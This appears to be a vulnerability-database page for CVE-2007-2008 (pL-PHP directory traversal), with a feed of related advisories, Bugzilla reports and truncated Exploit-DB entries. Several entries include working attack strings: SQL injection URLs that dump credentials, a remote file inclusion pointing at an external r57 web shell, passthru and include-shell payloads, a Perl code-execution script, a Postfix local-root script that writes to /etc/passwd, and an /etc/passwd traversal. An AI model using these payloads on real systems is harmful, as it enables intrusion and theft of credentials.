CVE-2007-2008
published 2007-04-12CVE-2007-2008: Directory traversal vulnerability in admin.php in pL-PHP beta 0.9 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.44%
82.2th percentile
Directory traversal vulnerability in admin.php in pL-PHP beta 0.9 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pl-php | pl-php | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-5pr6-chwj-gjpq: Directory traversal vulnerability in admin
ghsa_unreviewed·2022-05-01
CVE-2007-2008 [HIGH] GHSA-5pr6-chwj-gjpq: Directory traversal vulnerability in admin
Directory traversal vulnerability in admin.php in pL-PHP beta 0.9 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang parameter.
Red Hat
kvm/qemu/xen: Incomplete upstream fix for CVE-2007-1320
vendor_redhat·2008-10-29·CVSS 7.2
CVE-2008-4539 [HIGH] kvm/qemu/xen: Incomplete upstream fix for CVE-2007-1320
kvm/qemu/xen: Incomplete upstream fix for CVE-2007-1320
Heap-based buffer overflow in the Cirrus VGA implementation in (1) KVM before kvm-82 and (2) QEMU on Debian GNU/Linux and Ubuntu might allow local users to gain privileges by using the VNC console for a connection, aka the LGD-54XX "bitblt" heap overflow. NOTE: this issue exists because of an incorrect fix for CVE-2007-1320.
Red Hat
phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
vendor_redhat·2008-10-27·CVSS 6.8
CVE-2008-4775 [MEDIUM] CWE-79 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin 3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977.
Red Hat
compiz-fusion: Possible locked desktop access by using Expo plugin mouse shortcuts
vendor_redhat·2008-07-09·CVSS 6.2
CVE-2008-6514 [MEDIUM] compiz-fusion: Possible locked desktop access by using Expo plugin mouse shortcuts
compiz-fusion: Possible locked desktop access by using Expo plugin mouse shortcuts
The Expo plugin in Compiz Fusion 0.7.8 allows local users with physical access to drag the screen saver aside and access the locked desktop by using Expo mouse shortcuts, a related issue to CVE-2007-3920.
Red Hat
kernel: ptrace: Crash on PTRACE_{ATTACH,DETACH} race
vendor_redhat·2008-04-02·CVSS 4.9
CVE-2008-2365 [MEDIUM] kernel: ptrace: Crash on PTRACE_{ATTACH,DETACH} race
kernel: ptrace: Crash on PTRACE_{ATTACH,DETACH} race
Race condition in the ptrace and utrace support in the Linux kernel 2.6.9 through 2.6.25, as used in Red Hat Enterprise Linux (RHEL) 4, allows local users to cause a denial of service (oops) via a long series of PTRACE_ATTACH ptrace calls to another user's process that trigger a conflict between utrace_detach and report_quiescent, related to "late ptrace_may_attach() check" and "race around &dead_engine_ops setting," a different vulnerability than CVE-2007-0771 and CVE-2008-1514. NOTE: this issue might only affect kernel versions before 2.6.16.x.
Red Hat
acroread JavaScript Insecure Method Exposure
vendor_redhat·2008-02-08·CVSS 9.3
CVE-2007-5663 [CRITICAL] acroread JavaScript Insecure Method Exposure
acroread JavaScript Insecure Method Exposure
Adobe Reader and Acrobat 8.1.1 and earlier allows remote attackers to execute arbitrary code via a crafted PDF file that calls an insecure JavaScript method in the EScript.api plug-in. NOTE: this issue might be subsumed by CVE-2008-0655.
Red Hat
acroread JavaScript Insecure Libary Search Path
vendor_redhat·2008-02-08·CVSS 6.2
CVE-2007-5666 [MEDIUM] acroread JavaScript Insecure Libary Search Path
acroread JavaScript Insecure Libary Search Path
Untrusted search path vulnerability in Adobe Reader and Acrobat 8.1.1 and earlier allows local users to execute arbitrary code via a malicious Security Provider library in the reader's current working directory. NOTE: this issue might be subsumed by CVE-2008-0655.
Red Hat
CVE-2008-0495: Unspecified vulnerability in the Pegasus CIM Server in IBM Hardware Management Console (HMC) 7 R3
vendor_redhat·CVSS 7.5
CVE-2008-0495 [HIGH] CVE-2008-0495: Unspecified vulnerability in the Pegasus CIM Server in IBM Hardware Management Console (HMC) 7 R3
Unspecified vulnerability in the Pegasus CIM Server in IBM Hardware Management Console (HMC) 7 R3.2.0 allows remote attackers to cause a denial of service via unspecified vectors.
Statement: We believe this issue is a duplicate of CVE-2007-5360. Not vulnerable. This issue did not affect versions of tog-pegasus as shipped with Red Hat Enterprise Linux 4, or 5. For more details see https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2007-5360
No detection rules found.
Exploit-DB
Joomla! Component mDigg 2.2.8 - 'category' SQL Injection
exploitdb·2008-12-24
CVE-2008-6149 Joomla! Component mDigg 2.2.8 - 'category' SQL Injection
Joomla! Component mDigg 2.2.8 - 'category' SQL Injection
---
#############################################################
Joomla Component com_mdigg(category) SQL-injection vulnerability
#############################################################
###################################################
#[~] Author : boom3rang
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[~] Vulnerability : SQL injection
#[~] Google Dork : inurl:com_mdigg
#[!] Name : mdigg
#[!] CreationDate : 10-12-2007
#[!] Author : Zhigang Lei
#[!] AuthorEmail : [email protected]
#[!] Version : 2.2.8
###################################################
Example:
http://localHost/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]
Exploit:
-9999/**/union/
Exploit-DB
ClipShare Pro 2006-2007 - 'chid' SQL Injection
exploitdb·2008-11-15
CVE-2008-5489 ClipShare Pro 2006-2007 - 'chid' SQL Injection
ClipShare Pro 2006-2007 - 'chid' SQL Injection
---
SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM
S N N N A A K K E S T E A A M M M M
SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M
S N N N A A K K E S T E A A M M M
SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M
===================================================SNAKES TEAM====================================================
+ =
= Script: clipShare Remote SQL Injection Vulnerability +
+ =
==============================================:::ALGERIAN HaCkEr:::===============================================
= = = =
= = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = =
= =
= = ************ ::::::home : www.snakespc.com/sc::::::*************** = =
= =
= = :::::Mail: [email protected]::::::: = =
= =
= script:http://www.clip-sha
Exploit-DB
ProActive CMS - 'template' Local File Inclusion
exploitdb·2008-09-18
CVE-2008-4187 ProActive CMS - 'template' Local File Inclusion
ProActive CMS - 'template' Local File Inclusion
---
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ \_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE #
# and all darkc0de members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com
#
# Email : r45c4l@ho
Exploit-DB
iBoutique 4.0 - 'cat' SQL Injection
exploitdb·2008-09-12
CVE-2008-4354 iBoutique 4.0 - 'cat' SQL Injection
iBoutique 4.0 - 'cat' SQL Injection
---
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ \_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu#
# --- FeDeReR - DON - OutLawz - MAGE -JeTFyrE - Bond #
# and all darkc0de members ---#
################################################################
#
# Author: r45c4l and h4x0r
#
# Home : www.darkc0de.com
#
# Email : r
Exploit-DB
pNews 2.03 - 'newsid' SQL Injection
exploitdb·2008-09-12
CVE-2008-4347 pNews 2.03 - 'newsid' SQL Injection
pNews 2.03 - 'newsid' SQL Injection
---
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ \_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE #
# and all darkc0de members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com
#
# Email : [email protected]
#
Exploit-DB
Alstrasoft Forum - 'catid' SQL Injection
exploitdb·2008-09-09
CVE-2008-3954 Alstrasoft Forum - 'catid' SQL Injection
Alstrasoft Forum - 'catid' SQL Injection
---
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ \_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE #
# and all darkc0de members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com
#
# Email : [email protected]
Exploit-DB
Postfix 2.6-20080814 - 'symlink' Local Privilege Escalation
exploitdb·2008-08-31·CVSS 6.2
CVE-2008-2936 [MEDIUM] Postfix 2.6-20080814 - 'symlink' Local Privilege Escalation
Postfix 2.6-20080814 - 'symlink' Local Privilege Escalation
---
#!/bin/sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#
# Config
writable_dir=/tmp
spool_dir=/var/mail # Use "postconf mail_spool_directory" to obtain this
user=root
target=/etc/passwd
useful_link=/usr/bin/atq # lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at
useful_link_dst=at # Tip: find / -type l -uid 0 -print -exec ls -l {} \; | less
seconds=3
user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh" # Pass is "dsrrocks"
postfix=`which postfix` # /usr/sbin/postfix
postconf=/usr/sbin/postconf
postmap=/usr/sbin/postmap
# Funcs
quit()
{
echo "$1"
exit
}
# Step 1: is
Exploit-DB
phpAuction 3.2.1 - 'item.php' SQL Injection
exploitdb·2008-06-21
CVE-2008-2900 phpAuction 3.2.1 - 'item.php' SQL Injection
phpAuction 3.2.1 - 'item.php' SQL Injection
---
#########################################################
#
# phpauction-gpl Version3.2 Version SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# hussin.x[at]hotmail[DoT]com =
# =
#========================================================
# HomE script : http://www.phpauction.net
#
# Demo : http://www.phpauction.net/phpauction-gpl-3.2/
#
#
# DorK : Copyright 2007, PHPAUCTION.NET
#
#
##########################################################
Exploit:
http://www.site.net/[Pats]/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2
Exploit-DB
BrowserCRM 5.002.00 - 'clients.php' Remote File Inclusion
exploitdb·2008-06-08
CVE-2008-2690 BrowserCRM 5.002.00 - 'clients.php' Remote File Inclusion
BrowserCRM 5.002.00 - 'clients.php' Remote File Inclusion
---
script: browsercrm-5.002.00 remote file including
Download From: http://www.browsercrm.com/download/browsercrm-5.002.00.tar.gz
dork: Copyright © 2007 BrowserCRM Ltd
Vuln Code :
require_once($bcrm_pub_root . "/public_prepend.inc.php")
exploit:
www.site.com/browser_crm/pub/clients.php?bcrm_pub_root=http://www.gwebspace.de/mohsen/shell/r57.txt?
Author: ahmadbady | [email protected]
# milw0rm.com [2008-06-08]
Exploit-DB
Prozilla Hosting Index - 'cat_id' SQL Injection
exploitdb·2008-04-28
CVE-2008-2083 Prozilla Hosting Index - 'cat_id' SQL Injection
Prozilla Hosting Index - 'cat_id' SQL Injection
---
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_88$2008
[ECHO_ADV_88$2008] Prozilla Hosting Index (directory.php cat_id) Blind Sql Injection Vulnerability
Author : M.Hasran Addahroni
Date : April, 28 th 2007
Location : Jakarta, Indonesia
Web : http://advisories.echo.or.id/adv/adv88-K-159-2008.txt
Critical Lvl : Medium
Impact : System access
Where : From Remote
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Hosting Index
version : unknown
Vendor : http://www.prozilla.com/item.php?item=26
Description :
Vulnerability:
~~~~~~~~~~~~~
Input passed to the "cat_id" parameter in di
Exploit-DB
SAPID CMF Build 87 - 'last_module' Remote Code Execution
exploitdb·2008-02-10
CVE-2007-5056 SAPID CMF Build 87 - 'last_module' Remote Code Execution
SAPID CMF Build 87 - 'last_module' Remote Code Execution
---
### SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability
### Script R84 : http://puzzle.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.r84.zip
### Script Update R87 :http://surfnet.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.update.r84-r87.zip
### Dork : Powered by SAPID CMF Build 87
### Vuln :
### 09: */
eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
### POC :
### /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
### OR INCLUDE SHELL
### /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//
### I'm TrYaGi ......:)
# milw0rm.com [2008-02-10]
Exploit-DB
Open-Realty 2.4.3 - 'last_module' Remote Code Execution
exploitdb·2008-02-09
CVE-2007-5056 Open-Realty 2.4.3 - 'last_module' Remote Code Execution
Open-Realty 2.4.3 - 'last_module' Remote Code Execution
---
#!/usr/bin/perl
#
# Vendor url: www.open-realty.org
#
# note: exploit requires Register_globals = On in php.ini
# ~Iron
# http://www.randombase.com
require LWP::UserAgent;
print "#
# Open-Realty );
if($target !~ /^http:\/\//)
{
$target = "http://".$target;
}
if($target !~ /\/$/)
{
$target .= "/";
}
print "PHP code to evaluate? ";
chomp($code=);
$code =~ s/(|new;
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($target);
if ($response->is_success)
{
print "\n"."#" x 20 ."\n";
print $response->content;
print "\n"."#" x 20 ."\n";
}
else
{
die "Error: ".$response->status_line;
}
# milw0rm.com [2008-02-09]
Exploit-DB
PHP Links 1.3 - 'id' SQL Injection
exploitdb·2008-01-30
CVE-2008-0565 PHP Links 1.3 - 'id' SQL Injection
PHP Links 1.3 - 'id' SQL Injection
---
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
= Author : Houssamix From H-T Team
= Script : PHP Links from DeltaScripts <= 1.3
= Download : http://softadmin.deltascripts.com/download.php
(PHP Links v1.3 Released 13.09.2007 )
= BUG : Remote SQL Injection Vulnerability
= Dork : Powered by PHP Links from DeltaScripts
= Exploit :
vote.php?id=-1%20union%20select%20concat(user_name,0x3a,user_pass),2,3,4,5,6%20from%20phplinks_users%20where%20user_id=1--
= Note : admin login http://Target/path/admin/
= Greetz : CoNaN - Stack-Terrorist - Gold_M - Rachidox
# milw0rm.com [2008-01-30]
Exploit-DB
ClanSphere 2007.4.4 - 'install.php' Local File Inclusion
exploitdb·2008-01-28
CVE-2008-0489 ClanSphere 2007.4.4 - 'install.php' Local File Inclusion
ClanSphere 2007.4.4 - 'install.php' Local File Inclusion
---
source: https://www.securityfocus.com/bid/27471/info
ClanSphere is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to access potentially sensitive information that may aid in further attacks.
ClanSphere 2007.4.4 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/install.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
Exploit-DB
Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure
exploitdb·2008-01-06
CVE-2008-0210 Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure
Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure
---
----[ Uebimiau Web-Mail Remote File Reader ... ITDefence.ru Antichat.ru ]
Uebimiau Web-Mail Remote File Reader
Eugene Minaev [email protected]
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
At first i decided to look login script . Each script includes this code
0) {
..elseif (
($sess["auth"] && intval((time()-$start)/60) mail_user = $f_user = $sess["user"];
Exploit-DB
XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion
exploitdb·2008-01-06
CVE-2008-0138 XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion
XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion
---
----[ XOOPS mod_gallery Zend_Hash_key + Extract RFI ... ITDefence.ru Antichat.ru ]
XOOPS mod_gallery Zend_Hash_key + Extract REMOTE FILE INCLUDE
Eugene Minaev [email protected]
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
Bug works only with register_globals = OFF . I find their security fix very fun , and you ? : )
Hah .. very serious security
Exploit-DB
DivX Player 6.6.0 - ActiveX 'SetPassword()' Denial of Service (PoC)
exploitdb·2008-01-02
CVE-2008-0090 DivX Player 6.6.0 - ActiveX 'SetPassword()' Denial of Service (PoC)
DivX Player 6.6.0 - ActiveX 'SetPassword()' Denial of Service (PoC)
---
function crash() {
var buff = '';
for(i=0;i
DivX SetPassword (npUpload.dll) Denial of Service
Tested on IE 7 and Divx Player 6.6.0
Registers:
EAX 00000000
ECX FFFFFFFF
EDX 0191CA50
EBX 008E06E0
ESP 0191C9E4
EBP 0191CA50
ESI 00000000
EDI 00000000
EIP 061F2B52 npUpload.061F2B52
Access violation when reading [00000000]...
Discovered by shir, 02/01/2007
Crash...
# milw0rm.com [2008-01-02]
Exploit-DB
Ubuntu 6.06 - DHCPd Remote Denial of Service
exploitdb·2007-11-02·CVSS 7.2
CVE-2008-5010 [HIGH] Ubuntu 6.06 - DHCPd Remote Denial of Service
Ubuntu 6.06 - DHCPd Remote Denial of Service
---
Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit
Author: RoMaNSoFt
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz)
# milw0rm.com [2007-11-02]
Exploit-DB
Microworld eScan (Multiple Products) - Local Privilege Escalation
exploitdb·2007-08-30
CVE-2007-4649 Microworld eScan (Multiple Products) - Local Privilege Escalation
Microworld eScan (Multiple Products) - Local Privilege Escalation
---
source: https://www.securityfocus.com/bid/25493/info
Multiple MicroWorld eScan products are vulnerable to a local privilege-escalation vulnerability because of insecure default file permissions.
Attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers.
The following are vulnerable:
eScan Internet Security 9.0.722.1
eScan Virus Control 9.0.722.1
eScan AntiVirus 9.0.722.1
UPDATE (September 4, 2008): The following additional products have been reported as vulnerable:
eScan Corporate 9.0.x
eScan Professional 9.0.x
eScan Workstation Server 9.0.x
eScan Web and Mail Filter 9.0.x
MailScan for Mail-Server 5.6a
MailScan for SMT
Exploit-DB
pl-PHP Beta 0.9 - Multiple Vulnerabilities
exploitdb·2007-04-10
CVE-2007-2008 pl-PHP Beta 0.9 - Multiple Vulnerabilities
pl-PHP Beta 0.9 - Multiple Vulnerabilities
---
. . .
._ | _. .|_ _. _.;_/
[_)|(_]\_|[ )(_](_.| \.net
| ._|
"pL-PHP beta 0.9 - MULTIPLE VULNERABILITIES"
by Omni
1) Infos
Date : 2007-04-10
Product : pL-PHP
Version : beta 0.9 - Prior version maybe also be affected
Vendor : http://sourceforge.net/projects/pl-php/ - http://www.karlcore.com/programming/blog/
Vendor Status : 2007-04-10 -> Not Informed!
Description : pL-PHP is a new PHP Portal or Content Management System (CMS). It is based on a "multi-topics" system,
with sub-topics, and all the content (downloads, articles, headers, links...) is shared into these topics
and sub-topics. It will be very easy to use.
Source : omnipresent - omni
E-mail : omnipresent[at]email[dot]it - omni[at]playhack[dot]net
Team : Playhack.net Security
2) Sec
Trendmicro
CVE-2017-9791: New Apache Struts RCE Vulnerability
blogs_trendmicro·2017-07-13·CVSS 9.8
CVE-2017-9791 [CRITICAL] CVE-2017-9791: New Apache Struts RCE Vulnerability
# CVE-2017-9791: New Apache Struts RCE Vulnerability
The Apache Struts framework is useful for building modern Java-based web applications. A vulnerability has been found in this plugin that could allow remote code execution on the affected server, if used with Struts 2.3.x
By: Govind Sarda
2017/07/13
Read time: ( words)
Save to Folio
The Apache Struts framework is useful for building modern Java-based web applications, with two major versions, Apache Struts 1 and Apache Struts 2, released so far. Support for Apache Struts 1 ended in 2008 with the adoption of Apache Struts 2, which reached its first full release at the start of 2007. A Struts 1 plugin is available that allows developer to use existing Struts 1 Actions and ActionForms in Struts 2 web applications. A vulnerability has b
Trendmicro
CVE-2017-9791: New Apache Struts RCE Vulnerability
blogs_trendmicro·2017-07-13·CVSS 9.8
CVE-2017-9791 [CRITICAL] CVE-2017-9791: New Apache Struts RCE Vulnerability
## CVE-2017-9791: New Apache Struts RCE Vulnerability
The Apache Struts framework is useful for building modern Java-based web applications. A vulnerability has been found in this plugin that could allow remote code execution on the affected server, if used with Struts 2.3.x
By: Govind Sarda Jul 13, 2017 Read time: ( words)
Save to Folio
The Apache Struts framework is useful for building modern Java-based web applications, with two major versions, Apache Struts 1 and Apache Struts 2, released so far. Support for Apache Struts 1 ended in 2008 with the adoption of Apache Struts 2, which reached its first full release at the start of 2007. A Struts 1 plugin is available that allows developers to use existing Struts 1 Actions and ActionForms in Struts 2 web applications. A vulnerability ha
Talos
Flash Vulnerability Info
blogs_talos·2008-05-30·CVSS 9.3
[CRITICAL] Flash Vulnerability Info
## Flash Vulnerability Info
On 5-27-2008 Symantec issued a 0-day vulnerability alert pertaining to malicious flash (SWF) files circulating in the wild. The initial Symantec report stated that this issue was unknown and that it affected the latest version 9.0.124.0 of flash player and several other Adobe products that processed SWF files. Further analysis of the exploit files determined that the initial categorization of this as 0-day was incorrect and that this was actually a working implementation of the vulnerability described by Mark Dowd of the IBM X-Force team.
For more details on this flash vulnerability (CVE-2007-0071) then take a look at our analysis here:
http://www.snort.org/vrt/docs/analysis/flash-cve-2007-0071.html
Enjoy.
Bugzilla
CVE-2007-6731 xmp: Multiple buffer overflows in OXM decoder
bugzilla·2009-09-14·CVSS 10.0
CVE-2007-6731 [CRITICAL] CVE-2007-6731 xmp: Multiple buffer overflows in OXM decoder
CVE-2007-6731 xmp: Multiple buffer overflows in OXM decoder
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-6731 to
the following vulnerability:
Extended Module Player (XMP) 2.5.1 and earlier allow remote attackers
to execute arbitrary code via an OXM file with a negative value, which
bypasses a check in (1) test_oxm and (2) decrunch_oxm functions in
misc/oxm.c, leading to a buffer overflow.
References:
http://aluigi.altervista.org/adv/xmpbof-adv.txt
http://www.securityfocus.com/bid/27047
http://www.vupen.com/english/advisories/2008/0009
PoC:
----
http://aluigi.org/poc/xmpbof.zip (/a.out 1 out.oxm)
Upstream status -- issued addressed in xmp-2.6.0:
http://sourceforge.net/project/shownotes.php?group_id=26422&release_id=692238
Credit:
Luigi Auriemma
Discussion:
T
Bugzilla
CVE-2008-5316 lcms: insufficient input validation in ReadEmbeddedTextTag
bugzilla·2008-11-28·CVSS 9.3
CVE-2008-5316 [CRITICAL] CVE-2008-5316 lcms: insufficient input validation in ReadEmbeddedTextTag
CVE-2008-5316 lcms: insufficient input validation in ReadEmbeddedTextTag
The ReadEmbeddedTextTag in src/cmsio1.c did not properly check amount
of data read from the input file to the buffer provided as one of its
arguments. Value read from the file was used as an upper bound without
any validation.
This issue was fixed upstream in 1.16.
Upstream CVS commit:
http://lcms.cvs.sourceforge.net/viewvc/lcms/lcms/src/cmsio1.c?r1=1.33&r2=1.34
(some of the previous changes may be needed for 1.15)
References:
http://www.openwall.com/lists/oss-security/2008/11/28/3
Discussion:
Created attachment 325024
Patch used in SuSE security updates
This was extracted from SuSE liblcms-1.15-32.src.rpm. Original name of the patch was lcms-CVE-2007-2741.patch, but CVE-2007-2741 is a different issue that got
Bugzilla
CVE-2008-4775 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
bugzilla·2008-10-29·CVSS 6.8
CVE-2008-4775 [MEDIUM] CVE-2008-4775 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
CVE-2008-4775 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-4775 to the following vulnerability:
Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin
3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when
register_globals is enabled, allows remote attackers to inject
arbitrary web script or HTML via the db parameter, a different vector
than CVE-2006-6942 and CVE-2007-5977.
References:
http://www.securityfocus.com/archive/1/archive/1/497815/100/0/threaded
http://www.securityfocus.com/bid/31928
http://secunia.com/advisories/32449
Discussion:
613 (phpMyAdmin): Build on target fedora-4-epel succeeded.
612 (phpMyAdmin): Build on target fedora-5-epel suc
Bugzilla
CVE-2008-4539 kvm/qemu/xen: Incomplete upstream fix for CVE-2007-1320
bugzilla·2008-10-14·CVSS 7.2
CVE-2008-4539 [HIGH] CVE-2008-4539 kvm/qemu/xen: Incomplete upstream fix for CVE-2007-1320
CVE-2008-4539 kvm/qemu/xen: Incomplete upstream fix for CVE-2007-1320
Created attachment 320281
Proposed actualized upstream qemu patch to resolve the Cirrus LGD-54XX "bitblt" heap overflow (CVE-2007-1320)
Jan Niehusmann discovered that the upstream fix for the CVE-2007-1320 is
incomplete and still allows local users to cause a heap-based buffer overlow,
when connecting via the VNC console.
Steps to reproduce:
No reproducer.
Upstream qemu patch for the initial CVE-2007-1320 issue:
https://svn.pardus.org.tr/pardus/2007/applications/emulators/qemu/files/CVE-2007-1320.patch
Proposed upstream correction of this patch - see attachment.
Discussion:
QEMU upstream commit:
http://git.kernel.dk/?p=qemu.git;a=commitdiff;h=65d35a09979e63541afc5bfc595b9f1b1b4ae069
More on current status of thi
Bugzilla
CVE-2008-2957 pidgin: unrestricted download of arbitrary files triggered via UPnP
bugzilla·2008-07-02·CVSS 6.4
CVE-2008-2957 [MEDIUM] CVE-2008-2957 pidgin: unrestricted download of arbitrary files triggered via UPnP
CVE-2008-2957 pidgin: unrestricted download of arbitrary files triggered via UPnP
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-2957 to the following vulnerability:
The UPnP functionality in Pidgin 2.0.0, and possibly other versions,
allows remote attackers to trigger the download of arbitrary files and
cause a denial of service (memory or disk consumption) via a UDP
packet that specifies an arbitrary URL.
Proposed patch in CRISP Advisory 2007-01:
http://crisp.cs.du.edu/crisp-files/pidgin-2.0.0-upnp-limit-download.diff
References:
http://crisp.cs.du.edu/?q=ca2007-1
http://www.securityfocus.com/bid/29985
http://www.openwall.com/lists/oss-security/2008/06/27/3
Discussion:
Upstream advisory:
http://www.pidgin.im/news/security/?id=27
Fixed upstream in: 2.5.0
Bugzilla
